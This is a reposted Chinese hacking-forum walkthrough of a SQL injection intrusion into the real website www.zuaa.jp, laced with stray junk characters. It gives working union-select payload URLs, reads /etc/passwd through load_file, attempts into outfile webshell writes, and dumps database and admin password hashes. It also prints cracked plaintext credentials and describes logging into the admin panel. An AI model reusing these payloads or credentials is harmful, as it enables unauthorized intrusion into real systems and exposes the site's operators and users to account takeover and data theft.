|
|
- ]8 {6 e4 n6 B; e! }. K- H3 ~
& U5 N, A- y( v+ `* s" @) G7 V
0x01. 检测 www.zuaa.jp 收集数据+ q2 k# K( q% l/ M# U" K
+ {' e% [+ \0 D+ _% ?! V/ m' ^8 G8 ?8 K1 E
whatweb! E2 k7 ^, O0 Q9 x# [
7 [! r. G4 C- S
; ^# h* ~) {/ V, \! T利用NMAP扫描' ?: G, C* J+ { X
6 T( H& n. V/ X7 p# J
中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持
, ~" [6 m& b! {9 V3 B0x02.找注入点$ K/ O. `0 U/ C2 z
找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=390" |$ e1 g- a" F. r& U1 E8 t' }
8 p, o+ i9 F1 _ Y$ G* l9 C5 T
: L2 ~, A& H, D
0x03.order by
! h. s7 [9 n! n http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 17 j% c6 s w2 y& W: a, ^
" g$ K2 y& e2 h0 l/ D; A
order by 28报错,order by 27正常# q u# O: J1 S7 _- r, `8 s1 q
5 S! |- H1 x6 b' `# {. z% G( k0x04. union手动查询
' P: J( S. k0 f3 U! G, @http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 + t. I6 C; R1 B( L% R
添加到 27 时正常显示
6 ], f& v- F$ C, Q7 T/ U4 W2 X9 [- w& l$ g F b
中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持4 ?- J# L6 e9 I! o" o
/ v6 X+ h) Y) v$ r& Q& Y# A4 k0x05. info:
/ a8 Y+ S6 \4 y! S7 a; qhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
6 i/ c8 [5 ~( T7 ^" ]' A( G" J7 D' [
user: root@localhost# n) G5 I/ ^0 J5 R1 b* m. J1 ]3 u5 }
database: openpne" `. [. t( e" U. d3 G; p& t
version: 4.1.22
% M+ _& q2 c. D$ Qos: portbld-freebsd5.4
3 W, N% U h) v" C
5 G! Q4 E* v7 v! H0x06. root用户
/ y& }! `1 O! `" k7 s; {8 b利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)/ ]/ r2 X+ o% F* P4 u/ Q9 Z: q6 J
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
! _ _) S% A/ _, h# i8 z, w" }4 q1 f7 F: g
通过工具转换
7 ~# B( G$ S6 m: o. o! Q6 z- e, b
2 z1 w) ~' G6 q7 Z( q中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持) D, e4 o% C. F4 [7 H
' X/ b: F% Q3 m* _' @
0x07. 利用 into outfile
; j/ j' L# Z7 |0 N全部都失败
: S9 y2 R( \, s0 w( J4 O6 M, Xhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php- W- Q- M( x/ E* j) m- k) i
2 a- j9 }4 g, z" l5 C/ E+ |http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php
% b4 d; G) _% e' F3 A7 j
& K3 A0 F. n" d* j页面显示“MDB2 Error:syntax error”/ |( _) U# l+ q0 h4 ^; R
+ o5 M1 V4 i& B- m0x08. 利用 mysql 4.1$ A7 @& C! X1 o5 s1 N" @8 @, ~4 t6 j
猜常规表名,字段未果 工具 sqlmap( z1 \: r+ p" P1 Z. O) ^
中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持
* B7 t4 Z# v; [+ a q& S. a$ f! W( D3 Z' ]6 X! `
* c" G9 e. ?2 I7 h( f7 o
2 r6 y& ? y. q7 m' X0x09. 查找后台3 V/ Y! S7 G. B& k5 a/ V
利用 现有的各种 后台工具尝试都不行
* l5 o% a9 f' W) K
7 c7 r0 U/ E$ x1 o# w0x10. MySL外联方法 a+ E; D/ A$ b2 V+ g2 S* v& N
从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行
, r' e' d/ Z( g; T6 v2 ~/ s* w可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user- `% z+ o4 M# n/ v; b, B
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
( I/ q( F. Q$ c9 c3 q) K2 V* g% U" G1 V8 G
这个可以在 www.cmd5.com 解密3 i" L: G, |+ w8 u# K* {: ~$ ~7 ?) T4 a+ ^
root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009 V: `8 J7 Y6 c) j( ]
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
/ `7 u, s$ W3 P) g7 }7 Qopenpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???& T# X8 h- j$ n2 A0 J; H; s/ Z
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
5 a& e9 [" |. C) J" f* `( M2 q工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知* _8 g. N' y `2 H$ q0 U9 l4 q
. H" {% o* F! N* n( n# t& B, Q
) J& N( X x! G* p6 @0x11. 网站突破
$ W5 m) }- o6 z发现网站的源程序 openpne, google 下载 openpne 源码
+ j+ p4 K' H: `: i
5 w4 ]3 }+ E) a
) F6 ?3 e0 ]" o' Z2 z, Y" U0x12. 默认信息利用/ f4 I/ _% Z4 h; f" t/ X$ R
http://sns.zuaa.jp/?m=admin&a=page_login
9 q2 \+ D9 p5 }# g) ]5 T! G4 D% j$ @* x
表名 (c_admin_user) ,字段名(username,password)3 m( _$ j: N' Q4 E. c. n5 \
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
% | e1 }7 H+ z( N. Z( N7 Y' W/ Z9 l* J* |
解密1 |* l, K, h% E& `! h2 B" \
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda, zuaa2009
. l, m3 V1 ]# ?' Z2 Nzuaajp:c0923ec5857796a393da99905008c176, zju18973 Z% A. u7 z- e Q. t% B; H; k
; }! a* P/ H$ R! o) [7 x中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持9 O5 o/ m+ x2 \0 @# o
$ a+ s* v% n% J K5 W" r- J0x13. 登录后台
5 P |. X$ v# r
1 X# {) b7 P# b& E
' U1 o6 @; r( F: Q' S1 n# K1 F2 ]4 \) M. F5 O
0x14. 小结9 c9 q& s- L% o) ?
利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。$ V3 S3 ?2 {& ^5 ?% ~8 K6 ?
感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点( c6 a$ {# e" q- c5 T- k
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
4 c2 }4 F1 E: W- v中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持. T3 Y( c/ R9 ?# O
5 k) H6 E7 i# A; J1 I
最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!, t& R) a- `& ]9 q
|
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
|
发表于 2012-9-17 16:22:02
收藏
支持
反对
发表于 2012-9-19 08:27:03